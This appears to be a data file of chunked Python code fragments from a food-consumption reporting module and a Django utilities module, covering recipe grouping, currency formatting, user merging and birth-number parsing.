"filter_selections } self._ucr = FoodCaseData({ 'domain': domain, 'startdate': str(datespan.startdate), 'enddate': str(datespan.enddate), **{k: v",
"IN_UCR, IS_RECALL_META), I('urban_rural', IN_UCR, IS_RECALL_META), I('supplements', IN_UCR, IS_RECALL_META), I('food_code', IN_UCR), I('food_name', IN_UCR, IN_FOOD_FIXTURE),",
"and auditing columns reporting on what data is or isn't available. Some of",
"I('nsr_conv_option_desc_post_cooking', IN_UCR), I('nsr_measurement_amount_post_cooking', IN_UCR), I('nsr_consumed_cooked_fraction', IN_UCR), I('recipe_num_ingredients', CALCULATED_LATER), I('conv_factor_food_code'), I('conv_factor_base_term_food_code'), I('conv_factor_used'), I('conv_factor'), I('fct_food_code_exists'),",
"if not self.enrichment_complete: raise AttributeError(f\"{name} hasn't yet been set. It will be \"",
"ucr_row, fixtures, ingredient=None): self.uuid = uuid.uuid4() self.ucr_row = ucr_row self.fixtures = fixtures self._is_std_recipe_ingredient",
"self.total_grams, 0.01) def __getattr__(self, name): if name in _INDICATORS_BY_SLUG: indicator = _INDICATORS_BY_SLUG[name] if",
"defaultdict(lambda: { 'recipe': None, 'references': [], 'ingredients': [], }) for row in self._ucr.get_data():",
"self.food_type == FOOD_ITEM and self.fct_code: self.fct_gap_code = { 'food_code': FctGaps.AVAILABLE, 'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code':",
"UCR that hasn't been explicitly set, return that val return self.ucr_row[indicator.slug] if indicator.in_ucr",
"tags self.is_calculated_later = CALCULATED_LATER in tags # Indicator descriptions can be found here:",
"self.conv_factor_base_term_food_code = self.fixtures.conversion_factors.get( (self.base_term_food_code, self.conv_method_code, self.conv_option_code)) if self.conv_factor_food_code: self.conv_factor_used = 'food_code' self.conv_factor =",
"row in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe']",
"and row.fao_who_gift_food_group_code not in food_groups: return False return True def _get_grouped_rows(self): \"\"\"Return raw",
"ingredients) for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients)",
"= self.food_type in (STANDARD_RECIPE, NON_STANDARD_RECIPE) self.include_in_analysis = not self.is_recipe self.measurement_amount = _maybe_float(self.measurement_amount) self.portions",
"row in self._get_all_rows(): if self._matches_in_memory_filters(row): rows.append(row) return rows def _non_recipe_rows(self, rows): \"\"\"These rows",
"res[recipe.uuid] = sum(res.values()) if res else None except TypeError: res[recipe.uuid] = None return",
"in filter_selections: if slug not in self.FILTERABLE_COLUMNS: raise AssertionError(f\"{slug} is not a valid",
"len(ingredients) row.recipe_case_id = recipe.caseid if row.is_ingredient == 'yes': row.recipe_name = recipe.recipe_name if recipe.food_type",
"else None raise AttributeError(f\"FoodRow has no definition for {name}\") class FoodData: \"\"\"Generates the",
"for k, v in filter_selections.items() if k in FoodCaseData.FILTERABLE_COLUMNS} }) @classmethod def from_request(cls,",
"in self._ucr.get_data(): if row['food_type'] in (STANDARD_RECIPE, NON_STANDARD_RECIPE): if row['already_reported_recipe_case_id']: rows[row['already_reported_recipe_case_id']]['references'].append(row) else: rows[row['doc_id']]['recipe'] =",
"self._non_recipe_rows(references + ingredients) else: yield from self._recipe_rows(master_recipe, ingredients) for recipe in references: recipe",
"'base_term_food_code': FctGaps.BASE_TERM, 'reference_food_code': FctGaps.REFERENCE, }[self.fct_data_used] if self.is_recipe and ingredients: if all(i.fct_gap_code == FctGaps.AVAILABLE",
"for recipe in references: recipe = _insert_nsr_cols(recipe, master_recipe) yield from self._recipe_rows(recipe, ingredients) @property",
"'owner_id'}} ) @staticmethod def _get_owner_ids(domain, request): slugs = request.GET.getlist(EMWF.slug) if EMWF.no_filters_selected(slugs) or EMWF.show_all_data(slugs)",
"[ I('unique_respondent_id', IN_UCR, IS_RECALL_META), I('location_id', IN_UCR, IS_RECALL_META), I('respondent_id', IN_UCR, IS_RECALL_META), I('recall_case_id', IN_UCR, IS_RECALL_META),"
] |
[
"target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login",
"+ \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val <",
"= int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None): today = today or",
"FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\")",
"target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\",",
"from django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding",
"may be dangerous (It is not thread-safe in most of the implementations.) \"\"\"",
"\"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all():",
"attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects",
"_get_localeconv() # This function is inspired by python's standard locale.currency(). def currency(val, international=False):",
"+ \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv =",
"birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else \"\" def merge_objects(source,",
"elif sign_pos == 2: s = s + sign elif sign_pos == 3:",
"= s.replace(\">\", sign) else: # the default if nothing specified; # this should",
"source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login",
"s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes",
"getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target): from",
"# this should be the most fitting sign position s = sign +",
"= \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module load. It",
"must be inserted between symbol and value s = \"<\" + s +",
"url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\") def",
"url_with_back(url, url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try",
"else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first()",
"_get_localeconv(): \"\"\" This function loads localeconv during module load. It is necessary, because",
"remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)})) def reverse_with_back(request,",
"else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if",
"datetime import date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from",
"return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value):",
"to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove",
"== 0: s = \"(\" + s + \")\" elif sign_pos == 1:",
"s + sign elif sign_pos == 3: s = s.replace(\"<\", sign) elif sign_pos",
"query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse original",
"or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year,",
"= s + (separated and \" \" or \"\") + smb sign_pos =",
"@transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\",",
"else: s = s + (separated and \" \" or \"\") + smb",
"tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\", \"birth_num\")) tp.save()",
"= smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"]) precedes = localeconv[val < 0 and \"n_cs_precedes\"",
"localeconv during module load. It is necessary, because using locale.setlocale later may be",
"groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display",
"\" \" or \"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\"",
"s = smb + (separated and \" \" or \"\") + s else:",
"specified; # this should be the most fitting sign position s = sign",
"month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year, month,",
"\".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return lc localeconv = _get_localeconv()",
"birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return today.year",
"module load. It is necessary, because using locale.setlocale later may be dangerous (It",
"request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter =",
"try: # try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError:",
"fitting sign position s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \",",
"mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save() try: # support",
"= localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0",
"attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target",
"SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined = ( min(source.date_joined, target.date_joined)",
"attr)) return target @transaction.atomic def merge_users(source, target): from .models.subjects import SubjectRegistration target =",
"for x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return",
"target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login = (",
"\"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items)",
"def merge_objects(source, target, attributes=None, exclude=[]): attributes = attributes or [f.name for f in",
"y else: year = 1800 + y else: year = int(date.today().year / 100)",
"if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source,",
"else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and",
"sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp =",
"get_gender(birth_num): return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num =",
"target.last_login ) try: leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass",
"+= \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph",
"later may be dangerous (It is not thread-safe in most of the implementations.)",
"elif sign_pos == 1: s = sign + s elif sign_pos == 2:",
"try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month +",
"is inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to",
"\"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount",
"reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import",
"+ smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"] sign =",
"= smb + (separated and \" \" or \"\") + s else: s",
"sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi = merge_objects(sbi,",
"import RocketChat RocketChat().merge_users(source, target) source.delete() def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\"",
"dangerous (It is not thread-safe in most of the implementations.) \"\"\" original_locale_name =",
"attributes or [f.name for f in source._meta.fields if f.name not in exclude] for",
"symbol and value s = \"<\" + s + \">\" smb = smart_text(localeconv[international",
"# try to reuse original back url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass",
"\"\"\" This function loads localeconv during module load. It is necessary, because using",
"target, attributes=None, exclude=[]): attributes = attributes or [f.name for f in source._meta.fields if",
"== 2: s = s + sign elif sign_pos == 3: s =",
"\"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp",
"\"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"),",
"pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0] return \"{}?{}\".format(url, urlencode({settings.LEPRIKON_PARAM_BACK: iri_to_uri(url_back)}))",
"\"user\")) tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi =",
"[] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:])",
"f.name not in exclude] for attr in attributes: if not getattr(target, attr): setattr(target,",
"return today.year - birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s):",
"value s = \"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\"",
"(separated and \" \" or \"\") + s else: s = s +",
"if digits and not isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<'",
"from django.core.exceptions import ObjectDoesNotExist from django.db import IntegrityError, transaction from django.urls import reverse_lazy",
"re import string import unicodedata import zlib from datetime import date from urllib.parse",
"currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = []",
"isinstance(val, int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers",
"IntegrityError: # both users are leaders raise for attr in ( \"user\", \"created_by\",",
"of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL,",
"settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst))",
"except IntegrityError: # both users are leaders raise for attr in ( \"user\",",
"s = sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount):",
"international=False): \"\"\"Formats val according to the currency settings for current language.\"\"\" digits =",
"< 54: year = 1900 + y else: year = 1800 + y",
"y else: year = int(date.today().year / 100) * 100 + y if y",
"> 0: return settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO",
"+ s[1:] if s else \"\" def merge_objects(source, target, attributes=None, exclude=[]): attributes =",
"FEMALE = \"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module load.",
"s = s.replace(\">\", sign) else: # the default if nothing specified; # this",
"django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import",
"str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval]",
"= s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction for",
"django.db import IntegrityError, transaction from django.urls import reverse_lazy as reverse from django.utils.encoding import",
"url url_back = parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back",
"target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target mr.save()",
"else: sbi.user = target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient",
"= parse_qs(query)[settings.LEPRIKON_PARAM_BACK][0] except KeyError: pass # remove recursive back url url_back = recursive_back_splitter.split(url_back)[0]",
"def spayd(*items): s = \"SPD*1.0*\" + \"*\".join( \"%s:%s\" % (k, unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\",",
"IndexError: pass else: try: # try to reuse original back url url_back =",
"_(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters + string.digits): return \"\".join([stringset[i % len(stringset)] for",
"+ y if y > date.today().year % 100: year -= 100 month =",
"markers if the sign must be inserted between symbol and value s =",
"= target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\")) tp.save() else:",
"settings.LEPRIKON_COLOR_POSITIVE elif amount < 0: return settings.LEPRIKON_COLOR_NEGATIVE else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return",
"is necessary, because using locale.setlocale later may be dangerous (It is not thread-safe",
"else: return settings.LEPRIKON_COLOR_ZERO def ascii(value): return unicodedata.normalize(\"NFKD\", value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst =",
"ObjectDoesNotExist: pass except IntegrityError: # both users are leaders raise for attr in",
"def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\", \"\") y = int(birth_num[:2]) if len(birth_num) == 9:",
"groups = [] s = str(abs(int(val))) for interval in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s:",
"in locale._grouping_intervals(localeconv[\"mon_grouping\"]): if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s)",
"# before 1954 if y < 54: year = 1900 + y else:",
"def url_back(request): return request.POST.get( settings.LEPRIKON_PARAM_BACK, request.GET.get( settings.LEPRIKON_PARAM_BACK, reverse(\"leprikon:summary\"), ), ) recursive_back_splitter = re.compile(f\"[?&]{settings.LEPRIKON_PARAM_BACK}=\")",
"s = s + (separated and \" \" or \"\") + smb sign_pos",
"url_back.split(\"?\")[1] except IndexError: pass else: try: # try to reuse original back url",
"else: year = int(date.today().year / 100) * 100 + y if y >",
"SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp",
"): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp:",
"if not s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s",
"100 month = int(birth_num[2:4]) % 50 % 20 day = int(birth_num[4:6]) return date(year,",
"source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp =",
"target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name, last_name=sp.last_name).first() if tp: tp",
"tp, exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all():",
"locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0] + \".UTF-8\" locale.setlocale(locale.LC_ALL, str(locale_name)) lc = locale.localeconv() locale.setlocale(locale.LC_ALL, original_locale_name) return",
"target.date_joined = ( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined",
"sign) else: # the default if nothing specified; # this should be the",
"s = sign + s elif sign_pos == 2: s = s +",
"\"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr: source}).update(**{attr: target}) for sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first()",
"sign + s return s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount",
"\"(\" + s + \")\" elif sign_pos == 1: s = sign +",
"os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path def url_back(request):",
"from django.utils.functional import lazy from django.utils.safestring import mark_safe from django.utils.translation import ugettext_lazy as",
"leader = source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: #",
"x in os.urandom(length)]]) def current_url(request): if request.META[\"QUERY_STRING\"]: return \"{}?{}\".format(request.path, request.META[\"QUERY_STRING\"]) else: return request.path",
"'>' are markers if the sign must be inserted between symbol and value",
"and \"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and \"",
"return FEMALE if birth_num[2:4] > \"50\" else MALE def get_birth_date(birth_num): birth_num = birth_num.replace(\"/\",",
"y > date.today().year % 100: year -= 100 month = int(birth_num[2:4]) % 50",
"import settings MALE = \"m\" FEMALE = \"f\" def _get_localeconv(): \"\"\" This function",
"for attr in attributes: if not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return",
"# both users are leaders raise for attr in ( \"user\", \"created_by\", \"approved_by\",",
"and \").join([\", \".join(lst[:-1]), lst[-1]]) else: return _(\", and \").join(lst) def get_rand_hash(length=32, stringset=string.ascii_letters +",
"for attr in ( \"user\", \"created_by\", \"approved_by\", \"payment_requested_by\", \"refund_offered_by\", \"cancelation_requested_by\", \"canceled_by\", ): SubjectRegistration.objects.filter(**{attr:",
"\"positive_sign\"] if sign_pos == 0: s = \"(\" + s + \")\" elif",
"sign must be inserted between symbol and value s = \"<\" + s",
"sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\",",
"= s.replace(\"<\", sign) elif sign_pos == 4: s = s.replace(\">\", sign) else: #",
"if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader",
"from django.urls import reverse_lazy as reverse from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional",
"== 4: s = s.replace(\">\", sign) else: # the default if nothing specified;",
"\"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return",
"\" or \"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or",
"s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups) # display fraction",
"import os import re import string import unicodedata import zlib from datetime import",
"or \"\") + s else: s = s + (separated and \" \"",
"value).encode(\"ascii\", errors=\"ignore\").decode(\"ascii\") def comma_separated(lst): lst = list(map(smart_text, lst)) if len(lst) > 2: return",
"and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if",
"= target mr.save() try: # support social auth source.social_auth.update(user=target) except AttributeError: pass from",
"and target.last_login else source.last_login or target.last_login ) try: leader = source.leprikon_leader leader.user =",
"url_back): try: query = url_back.split(\"?\")[1] except IndexError: pass else: try: # try to",
"localeconv = _get_localeconv() # This function is inspired by python's standard locale.currency(). def",
"if y > date.today().year % 100: year -= 100 month = int(birth_num[2:4]) %",
"= target sp.save() for sbi in source.leprikon_billing_info.all(): tbi = target.leprikon_billing_info.filter(name=sbi.name).first() if tbi: tbi",
"because using locale.setlocale later may be dangerous (It is not thread-safe in most",
"sign + s elif sign_pos == 2: s = s + sign elif",
"2: s = s + sign elif sign_pos == 3: s = s.replace(\"<\",",
"fraction for non integer values if digits and not isinstance(val, int): s +=",
"= \"<\" + s + \">\" smb = smart_text(localeconv[international and \"int_curr_symbol\" or \"currency_symbol\"])",
"int(date.today().year / 100) * 100 + y if y > date.today().year % 100:",
"today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day) except ValueError: birth_day_this_year =",
"zlib.crc32(s.encode()) return s.upper() def paragraph(text): return mark_safe(f\"<p>{text.strip()}</p>\".replace(\"\\n\", \"<br/>\\n\").replace(\"<br/>\\n<br/>\\n\", \"</p>\\n\\n<p>\")) lazy_paragraph = lazy(paragraph, str)",
"date(today.year, birth_date.month + 1, 1) if birth_day_this_year > today: return today.year - birth_date.year",
"\"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s +",
"today.year - birth_date.year def first_upper(s): return s[0].upper() + s[1:] if s else \"\"",
"\"user\", \"birth_num\")) tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp",
"s.replace(\"<\", \"\").replace(\">\", \"\").replace(\" \", \"\\u00A0\") def amount_color(amount): if amount > 0: return settings.LEPRIKON_COLOR_POSITIVE",
"\"n_sep_by_space\" or \"p_sep_by_space\"] if precedes: s = smb + (separated and \" \"",
"50 % 20 day = int(birth_num[4:6]) return date(year, month, day) def get_age(birth_date, today=None):",
"def first_upper(s): return s[0].upper() + s[1:] if s else \"\" def merge_objects(source, target,",
"today: return today.year - birth_date.year - 1 else: return today.year - birth_date.year def",
"from django.utils.encoding import iri_to_uri, smart_text from django.utils.functional import lazy from django.utils.safestring import mark_safe",
"django.utils.translation import ugettext_lazy as _ from .conf import settings MALE = \"m\" FEMALE",
"\"f\" def _get_localeconv(): \"\"\" This function loads localeconv during module load. It is",
"( min(source.date_joined, target.date_joined) if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login",
"\"\"\"Formats val according to the currency settings for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES",
"= target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are leaders",
"sign_pos == 0: s = \"(\" + s + \")\" elif sign_pos ==",
"from .models.subjects import SubjectRegistration target = merge_objects(source, target, (\"first_name\", \"last_name\", \"email\")) target.date_joined =",
"inspired by python's standard locale.currency(). def currency(val, international=False): \"\"\"Formats val according to the",
"target.last_login) if source.last_login and target.last_login else source.last_login or target.last_login ) try: leader =",
"- birth_date.year - 1 else: return today.year - birth_date.year def first_upper(s): return s[0].upper()",
"target.date_joined ) target.last_login = ( max(source.last_login, target.last_login) if source.last_login and target.last_login else source.last_login",
"= target sbi.save() for mr in source.leprikon_messages.all(): if not target.leprikon_messages.filter(message=mr.message).exists(): mr.recipient = target",
"in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\", \"user\",",
"for current language.\"\"\" digits = settings.PRICE_DECIMAL_PLACES # grouping groups = [] s =",
"date from urllib.parse import parse_qs, urlencode from django.core.exceptions import ObjectDoesNotExist from django.db import",
"reverse_with_back(request, *args, **kwargs): return url_with_back(reverse(*args, **kwargs), current_url(request)) def get_gender(birth_num): return FEMALE if birth_num[2:4]",
"sp in source.leprikon_participants.all(): tp = target.leprikon_participants.filter(birth_num=sp.birth_num).first() if tp: tp = merge_objects(sp, tp, exclude=(\"id\",",
"tp.save() else: sp.user = target sp.save() for sp in source.leprikon_parents.all(): tp = target.leprikon_parents.filter(first_name=sp.first_name,",
"not getattr(target, attr): setattr(target, attr, getattr(source, attr)) return target @transaction.atomic def merge_users(source, target):",
"exclude=(\"id\", \"user\")) tp.save() else: sp.user = target sp.save() for sbi in source.leprikon_billing_info.all(): tbi",
"s: break groups.append(s[-interval:]) s = s[:-interval] if s: groups.append(s) groups.reverse() s = smart_text(localeconv[\"mon_thousands_sep\"]).join(groups)",
"and value s = \"<\" + s + \">\" smb = smart_text(localeconv[international and",
"= source.leprikon_leader leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both",
"get_age(birth_date, today=None): today = today or date.today() try: birth_day_this_year = date(today.year, birth_date.month, birth_date.day)",
"+ (separated and \" \" or \"\") + smb sign_pos = localeconv[val <",
"lst = list(map(smart_text, lst)) if len(lst) > 2: return _(\", and \").join([\", \".join(lst[:-1]),",
"+ 1, 1) if birth_day_this_year > today: return today.year - birth_date.year - 1",
"if source.date_joined and target.date_joined else source.date_joined or target.date_joined ) target.last_login = ( max(source.last_login,",
"and \"negative_sign\" or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s",
"localeconv[val < 0 and \"n_cs_precedes\" or \"p_cs_precedes\"] separated = localeconv[val < 0 and",
"k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper() def",
"thread-safe in most of the implementations.) \"\"\" original_locale_name = locale.setlocale(locale.LC_ALL) locale_name = locale.locale_alias[settings.LANGUAGE_CODE].split(\".\")[0]",
"for k, v in sorted(items) ) s += \"*CRC32:%x\" % zlib.crc32(s.encode()) return s.upper()",
"or \"positive_sign\"] if sign_pos == 0: s = \"(\" + s + \")\"",
"or \"\") + smb sign_pos = localeconv[val < 0 and \"n_sign_posn\" or \"p_sign_posn\"]",
"unicodedata.normalize(\"NFKD\", str(v).replace(\"*\", \"\")).encode(\"ascii\", \"ignore\").upper().decode()) for k, v in sorted(items) ) s += \"*CRC32:%x\"",
"int): s += smart_text(localeconv[\"mon_decimal_point\"]) + \"{{:.{}f}}\".format(digits).format(val).split(\".\")[1] # '<' and '>' are markers if",
"leader.user = target leader.save() except ObjectDoesNotExist: pass except IntegrityError: # both users are",
"birth_date.day) except ValueError: birth_day_this_year = date(today.year, birth_date.month + 1, 1) if birth_day_this_year >",
